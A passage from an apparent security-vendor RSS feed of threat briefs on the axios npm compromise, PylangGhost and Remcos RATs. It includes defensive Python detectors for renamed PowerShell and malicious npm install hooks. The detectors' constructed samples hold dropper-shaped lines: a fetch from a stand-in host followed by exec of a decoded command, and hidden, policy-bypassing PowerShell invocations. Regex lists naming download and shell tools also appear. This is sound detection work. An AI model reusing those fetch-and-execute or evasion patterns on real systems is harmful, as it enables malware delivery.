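<p>The Windows stage of the attack chain and the <code>wt.exe</code> recommendation above, as an added example that is not Talos&rsquo;s, Axios&rsquo;s or the attacker&rsquo;s code: renaming <code>powershell.exe</code> changes the process image but not its PE version resource, so Sysmon Event ID 1 still reports <code>OriginalFileName=PowerShell.EXE</code>. The Python check below compares that field with the on-disk name, flags <code>powershell.exe</code> copies outside their install directories, and uses the hidden-window and bypass switches plus a <code>node.exe</code> parent to raise confidence. The events are constructed Sysmon-style records and the install directories are assumed.</p>

```python
"""Added example (not Talos's, Axios's or the attacker's code): catch the
Windows stage of this chain, where powershell.exe is copied to
%PROGRAMDATA%\wt.exe and that copy runs the dropped script. Renaming a
binary changes the process image but not its PE version resource, so Sysmon
Event ID 1 still reports OriginalFileName=PowerShell.EXE; comparing that to
the on-disk name catches the copy wherever it lands, and the hidden-window
and execution-policy-bypass switches raise the confidence. The events are
constructed Sysmon-style records; the known install directories are assumed."""
import ntpath
import re
from typing import Optional

KNOWN_PS_DIRS = (                                     # assumed: default Windows PowerShell 5.1 paths
    r"c:\windows\system32\windowspowershell\v1.0",
    r"c:\windows\syswow64\windowspowershell\v1.0",
)
EVASION_SWITCHES = [                                  # PowerShell accepts unambiguous prefixes
    re.compile(r"-(?:w|win|windowstyle)\s+hidden", re.I),
    re.compile(r"-(?:ep|exec|executionpolicy)\s+bypass", re.I),
    re.compile(r"-(?:nop|noprofile)\b", re.I),
]
INSTALLER_PARENTS = {"node.exe"}                      # npm lifecycle scripts run under node


def assess(ev: dict) -> Optional[dict]:
    """Return a finding for one process-creation event, or None."""
    image = ev.get("Image", "")
    base = ntpath.basename(image).lower()
    folder = ntpath.dirname(image).lower()
    original = ev.get("OriginalFileName", "").lower()
    cmd = ev.get("CommandLine", "")
    parent = ntpath.basename(ev.get("ParentImage", "")).lower()
    reasons = []
    if original == "powershell.exe" and base != "powershell.exe":
        reasons.append(f"PowerShell running under a different name ({base})")
    if base == "powershell.exe" and folder not in KNOWN_PS_DIRS:
        reasons.append("powershell.exe copy outside its install directories")
    hits = sum(1 for rx in EVASION_SWITCHES if rx.search(cmd))
    if reasons and hits:
        reasons.append(f"{hits} evasion switch(es) on the command line")
    if hits >= 2 and parent in INSTALLER_PARENTS:
        reasons.append(f"launched by {parent} with hidden/bypass switches")
    if not reasons:
        return None
    return {"ProcessId": ev["ProcessId"], "Image": image, "ParentImage": ev.get("ParentImage", ""),
            "reasons": reasons}


# Constructed Sysmon Event ID 1 records.
SAMPLE_EVENTS = [
    {"ProcessId": 5001, "Image": r"C:\ProgramData\wt.exe", "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Program Files\nodejs\node.exe",
     "CommandLine": r"C:\ProgramData\wt.exe -w hidden -ep bypass -f C:\Users\dev\AppData\Local\Temp\6202033.ps1"},
    {"ProcessId": 5002, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "OriginalFileName": "PowerShell.EXE", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date"},
    {"ProcessId": 5003, "Image": r"C:\Users\Public\powershell.exe", "OriginalFileName": "PowerShell.EXE",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe -nop -w hidden -c whoami"},
    {"ProcessId": 5004, "Image": r"C:\Windows\System32\cmd.exe", "OriginalFileName": "Cmd.Exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "cmd.exe /c dir"},
]


def run(events=SAMPLE_EVENTS) -> list:
    return [f for f in map(assess, events) if f]


if __name__ == "__main__":
    for f in run():
        print(f["ProcessId"], f["Image"], "|", "; ".join(f["reasons"]))
```

<p>The <code>OriginalFileName</code> comparison is the durable part: it does not care whether the copy is called <code>wt.exe</code> or anything else, and it generalises to other renamed interpreters by extending the name map. Tune <code>KNOWN_PS_DIRS</code> if you deploy PowerShell 7, whose <code>pwsh.exe</code> lives under Program Files and is not covered here.</p>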
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>npm</category><category>javascript</category><category>rat</category></item><item><title>Compromised Axios Library Leads to RAT Deployment via @usebruno/cli</title><link>https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/</link><pubDate>Fri, 03 Apr 2026 12:00:00 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-axios-supply-chain/</guid><description>Compromised versions of the `axios` npm package introduced a hidden dependency deploying a cross-platform Remote Access Trojan (RAT), impacting users of `@usebruno/cli` who ran `npm install` between 00:21 UTC and ~03:30 UTC on March 31, 2026, potentially leading to credential exfiltration.</description><content:encoded><![CDATA[<p>On March 31, 2026, a supply chain attack targeted the <code>axios</code> npm package, a widely used HTTP client library for JavaScript. Compromised versions 1.14.1 and 0.30.4 of the library were injected with malicious code that installed a cross-platform Remote Access Trojan (RAT) on systems that installed the affected versions of <code>@usebruno/cli</code>. This attack specifically impacted users of the <code>@usebruno/cli</code> who performed an <code>npm install</code> within a roughly 3-hour window, between 00:21 UTC and 03:30 UTC. The malicious code was designed to execute during the <code>postinstall</code> phase of the package installation, indicating a targeted effort to compromise developer environments. This incident highlights the increasing risk of supply chain attacks targeting open-source software and the importance of verifying the integrity of third-party dependencies.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker compromises the <code>axios</code> npm package, injecting malicious code into versions 1.14.1 and 0.30.4.</li>
<li>The compromised <code>axios</code> package is published to the npm registry.</li>
<li>A user of <code>@usebruno/cli</code> executes <code>npm install</code> within the attack window (00:21 UTC - 03:30 UTC on March 31, 2026).</li>
<li>The npm package manager resolves the dependency chain and downloads the compromised <code>axios</code> package as a dependency of <code>@usebruno/cli</code>.</li>
<li>The hidden dependency introduced by the compromised <code>axios</code> package executes during the <code>postinstall</code> script phase of the installation, before the developer has run any of their own code.</li>
<li>The <code>postinstall</code> script downloads and installs a cross-platform Remote Access Trojan (RAT) on the user&rsquo;s system.</li>
<li>The RAT establishes a connection to a remote command-and-control (C2) server.</li>
<li>The attacker uses the RAT to exfiltrate credentials and other sensitive data from the compromised system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>This supply chain attack could have resulted in widespread compromise of developer systems that used the <code>@usebruno/cli</code>. While the number of affected users is unknown, the incident could have led to the exfiltration of sensitive credentials and proprietary source code, potentially enabling further attacks against the affected organizations and their customers. The incident underscores the need for robust security measures in software development pipelines and continuous monitoring of third-party dependencies for malicious activity.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>If <code>@usebruno/cli</code> was installed during the affected window, update the lock file to a clean <code>axios</code> version and reinstall dependencies from scratch so that no compromised copy remains in <code>node_modules</code>.</li>
<li>Rotate every credential and secret that was present on systems where <code>@usebruno/cli</code> was installed during the affected window; treat them as exposed, not merely at risk.</li>
<li>Review and apply the hardening guidance in the Aikido Security write-up: <a href="https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat">https://www.aikido.dev/blog/axios-npm-compromised-maintainer-hijacked-rat</a>.</li>
<li>Monitor process creation events for unusual child processes of npm or node, using the provided Sigma rule &ldquo;Detect Suspicious Process Spawned by NPM&rdquo;.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>supply-chain</category><category>npm</category><category>rat</category><category>credential-theft</category></item><item><title>PylangGhost RAT Observed on npm Registry</title><link>https://feed.craftedsignal.io/briefs/2024-01-pylangghost-npm/</link><pubDate>Mon, 16 Mar 2026 04:45:53 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-pylangghost-npm/</guid><description>A new remote access trojan (RAT) named PylangGhost has been observed on the npm registry, posing a supply chain risk to developers and applications using affected packages.</description><content:encoded><![CDATA[<p>A new remote access trojan (RAT) named PylangGhost has been discovered on the npm registry. This marks the first known instance of this specific RAT being distributed via a software supply chain attack on the npm ecosystem. The name reflects the RAT&rsquo;s Python implementation. The affected npm packages inject malicious code into projects that depend on them; that code gives the threat actors remote access to infected systems, from which they can exfiltrate sensitive data, deploy further malware, or carry out other malicious activity. It is a supply chain attack that endangers both developers and the applications they build.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>A developer installs a malicious package from the npm registry containing PylangGhost.</li>
<li>During the installation process, a post-install script or similar mechanism executes, injecting the PylangGhost RAT into the developer&rsquo;s environment.</li>
<li>The RAT establishes a connection to a command-and-control (C2) server controlled by the attacker.</li>
<li>The C2 server sends commands to the infected system, instructing the RAT to perform specific actions.</li>
<li>The RAT executes the commands, potentially including data exfiltration, downloading and executing additional payloads, or establishing persistence.</li>
<li>Sensitive data, such as credentials, API keys, or source code, is exfiltrated from the compromised system to the C2 server.</li>
<li>The attacker gains remote access and control over the compromised system, enabling further malicious activities.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The presence of PylangGhost on the npm registry introduces a significant supply chain risk.  Successful infection allows attackers to gain remote access to developer systems, potentially leading to the theft of sensitive source code, credentials, and other proprietary information. The compromise can extend to applications built using the infected packages, impacting downstream users and potentially leading to widespread data breaches or service disruptions. The number of affected victims is currently unknown, but the risk is widespread due to the popularity of the npm registry.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Monitor npm package installations for suspicious post-install scripts or unexpected network connections (see related Sigma rules).</li>
<li>Implement strong dependency scanning tools to identify and remove potentially malicious packages from your projects.</li>
<li>Analyze network connection logs for connections to unusual or malicious domains after npm package installations (see related Sigma rules).</li>
<li>Enable process monitoring for any processes spawned during or after npm package installations.</li>
</ul>
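<p>The first recommendation above (reviewing npm installs for suspicious post-install scripts), as an added example that is not PylangGhost&rsquo;s or npm&rsquo;s code: a Python audit that walks an installed <code>node_modules</code> tree, lists every package declaring an install-time lifecycle hook, follows a hook of the form <code>node file.js</code> into the local script, and scores the text for the primitives a dropper needs (remote fetch, blob decoding, spawning a shell or interpreter). The small package tree it writes to a temporary directory is constructed, including the TEST-NET payload address.</p>

```python
"""Added example (not PylangGhost's or npm's code): walk an installed
node_modules tree and report every package whose package.json declares an
install-time lifecycle hook (preinstall, install, postinstall, prepare),
then score the hook for what a dropper needs: fetching something remote,
decoding a blob, or spawning a shell or interpreter. When the hook just runs
a local script (`node install.js`) that file is read and scored too. A small
constructed tree is written to a temporary directory so this runs offline."""
import json
import re
import tempfile
from pathlib import Path

HOOKS = ("preinstall", "install", "postinstall", "prepare")
INDICATORS = {
    "remote fetch": re.compile(r"(curl |wget |Invoke-WebRequest|\biwr\b|\bfetch\(|https?\.get\()", re.I),
    "decode blob": re.compile(r"(base64|\batob\(|Buffer\.from\()", re.I),
    "spawn": re.compile(r"(child_process|\bexec\(|\bspawn\(|powershell|cmd\.exe|/bin/sh|bash -c|\bpython3?\b)", re.I),
    "inline code": re.compile(r"\bnode\s+-e\b|\bpython3?\s+-c\b", re.I),
}
LOCAL_SCRIPT_RE = re.compile(r"\bnode\s+([\w./\\-]+\.c?js)\b")


def score(text: str) -> list:
    """Names of the indicator classes present in a hook command or script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def audit(root: Path) -> list:
    """One finding per lifecycle hook in any package under root/node_modules."""
    findings = []
    for manifest in sorted((root / "node_modules").rglob("package.json")):
        try:
            data = json.loads(manifest.read_text(encoding="utf-8"))
        except (json.JSONDecodeError, OSError):
            continue
        for hook in HOOKS:
            cmd = (data.get("scripts") or {}).get(hook)
            if not cmd:
                continue
            text = cmd
            for rel in LOCAL_SCRIPT_RE.findall(cmd):             # follow `node file.js`
                local = manifest.parent / rel
                if local.is_file():
                    text += "\n" + local.read_text(encoding="utf-8", errors="replace")
            findings.append({"package": data.get("name", manifest.parent.name),
                             "hook": hook, "command": cmd, "indicators": score(text)})
    return findings


# Constructed tree: one clean package, one benign hook, one dropper-shaped hook.
SAMPLE_TREE = {
    "left-pad/package.json": json.dumps({"name": "left-pad", "version": "1.3.0"}),
    "fast-native/package.json": json.dumps({"name": "fast-native", "version": "2.1.0",
                                            "scripts": {"postinstall": "node install.js"}}),
    "fast-native/install.js": "require('fs').chmodSync('bin/tool', 0o755); // bundled binary setup\n",
    "plain-crypto-js/package.json": json.dumps({"name": "plain-crypto-js", "version": "0.0.0-demo",
                                                "scripts": {"postinstall": "node setup.js"}}),
    "plain-crypto-js/setup.js": (
        "const https = require('https'); const { exec } = require('child_process');\n"
        "https.get('http://203.0.113.5/stage', r => { /* constructed stand-in for the real fetch */ });\n"
        "exec(Buffer.from('ZWNobyBkZW1v', 'base64').toString());\n"
    ),
}


def build_sample_tree() -> Path:
    root = Path(tempfile.mkdtemp(prefix="nm-audit-"))
    for rel, content in SAMPLE_TREE.items():
        target = root / "node_modules" / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_text(content, encoding="utf-8")
    return root


def run() -> list:
    return audit(build_sample_tree())


if __name__ == "__main__":
    for f in run():
        print(f["package"], f["hook"], repr(f["command"]), f["indicators"] or "no indicators")
```

<p>A hook with no indicators (the <code>fast-native</code> case) is still worth knowing about, which is why it is reported rather than dropped; a package that needs an install hook is a package you should be able to name. For CI and developer machines, <code>npm install --ignore-scripts</code> (or <code>npm config set ignore-scripts true</code>) prevents hooks from running at all, after which the few packages that genuinely need one can be rebuilt deliberately with <code>npm rebuild &lt;package&gt;</code> once reviewed.</p>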
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>supply-chain</category><category>rat</category><category>npm</category><category>pylangghost</category></item><item><title>Fileless Multi-Stage Remcos RAT via Phishing</title><link>https://feed.craftedsignal.io/briefs/2024-01-remcos-fileless/</link><pubDate>Sun, 15 Mar 2026 15:34:12 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-remcos-fileless/</guid><description>A fileless multi-stage Remcos RAT is delivered via phishing, achieving memory-resident execution, but specific technical details are not provided in this brief.</description><content:encoded><![CDATA[<p>This threat brief discusses a Remcos RAT infection chain that utilizes a fileless, multi-stage approach. While specific details regarding the initial phishing lure, exploitation method, and Remcos RAT version are absent from the original report, the core focus is on the fileless execution and memory residency of the RAT. The attack begins with an unspecified phishing attack and culminates in a Remcos RAT running entirely in memory, hindering traditional disk-based forensic analysis. This type of attack poses a significant challenge to traditional endpoint detection and response (EDR) solutions. The scope and scale of this campaign are unknown, but fileless techniques are generally employed in targeted attacks.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An unsuspecting user receives a phishing email containing a malicious attachment or link (specific delivery mechanism not specified).</li>
<li>The user interacts with the malicious content, initiating the first stage of the attack.</li>
<li>A script (e.g., PowerShell, VBScript) is executed, likely delivered through the phishing attachment/link.</li>
<li>The script downloads and executes additional payloads directly into memory, avoiding writing files to disk.</li>
<li>The downloaded payload injects Remcos RAT into a legitimate system process (process injection).</li>
<li>Remcos RAT establishes a command and control (C2) connection with the attacker&rsquo;s server for further instructions.</li>
<li>The attacker can then perform various malicious activities such as data exfiltration, keylogging, or lateral movement.</li>
<li>The Remcos RAT persists in memory, potentially evading detection by signature-based antivirus solutions.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The successful deployment of Remcos RAT can lead to significant data breaches, intellectual property theft, and financial losses. Victims may experience system instability, unauthorized access to sensitive information, and reputational damage. The fileless nature of the attack makes it harder to detect and remediate, potentially prolonging the dwell time and increasing the overall impact. The number of victims and targeted sectors are not specified in the original source.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Enable PowerShell script block logging and transcription to enhance visibility into potentially malicious script execution (reference attack chain step 3).</li>
<li>Monitor process creation events for suspicious parent-child relationships (e.g., <code>cmd.exe</code> or <code>powershell.exe</code> spawning uncommon processes) to detect injected Remcos processes (reference attack chain step 5).</li>
<li>Deploy the Sigma rules provided below to your SIEM and tune them for your specific environment.</li>
<li>Implement application control policies to restrict the execution of unauthorized or unknown scripts and binaries (reference attack chain step 4).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>remcos</category><category>rat</category><category>fileless</category><category>phishing</category></item></channel></rss>